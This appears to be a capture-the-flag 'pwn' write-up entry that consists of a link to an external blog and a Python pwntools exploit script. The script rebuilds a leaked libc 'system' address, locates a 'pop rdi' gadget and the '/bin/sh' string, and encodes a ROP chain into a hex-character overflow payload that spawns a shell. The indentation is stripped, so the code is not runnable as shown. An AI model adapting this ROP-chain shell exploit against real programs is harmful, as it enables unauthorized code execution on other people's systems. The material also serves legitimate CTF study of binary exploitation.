Tags: pwn 

Rating:

> Write Up : https://uz56764.tistory.com/92

```
from pwn import *
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")

#0x7ffff7d7cd60
a = input()
a += input()
a = a[:len(a)-1]

def rlist(str):
x = "[0x"+str.replace(" ", ", 0x")+"]"
rs = eval(x)
return rs

a = rlist(a.replace("\n"," "))
a1 = [4-1, 5-1, 6-1, 1-1, 2-1, 3-1]

system_bytes = [0]*8

for i in range(len(a1)):
a[i] = a[i] ^ 0x41
for i in range(len(a1)):
system_bytes[a1[i]] = a[i]

system_rs = b""
for w in system_bytes:
system_rs += w.to_bytes(1,'big')

system_addr = u64(system_rs)

#system_addr = int(input(),16)
pop_rdi = system_addr - libc.symbols['system'] + 0x000000000002a3e5
binsh = system_addr - libc.symbols['system'] + list(libc.search(b'/bin/sh'))[0]

print(f'system_addr : {hex(system_addr)}')
print(f'pop_rdi : {hex(pop_rdi)}')
print(f'binsh : {hex(binsh)}')

ROP_chain = p64(pop_rdi) + p64(binsh) + p64(pop_rdi+1) + p64(system_addr)

pay = b'````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````````'
pay += b'`'*(0x40*2)

for w in ROP_chain:
a1 = (w & 0xf0) >> 4
rs = (a1 + 48)

if(rs > 0x2F and rs <= 0x39):
pay += rs.to_bytes(1,'big')
else:
a1 = (w & 0xf0) >> 4
rs = (a1 + 97 - 10)
if( rs <= 0x60 or rs > 0x7A ):
print('fail')
pay += rs.to_bytes(1,'big')

a2 = w & 0xf
rs = (a2 + 48)

if(rs > 0x2F and rs <= 0x39):
pay += rs.to_bytes(1,'big')
else:
a2 = w & 0xf
rs = (a2 + 97 - 10)
if( rs <= 0x60 or rs > 0x7A ):
print('fail')
pay += rs.to_bytes(1,'big')

print(pay.decode())
```

Original writeup (https://uz56764.tistory.com/92).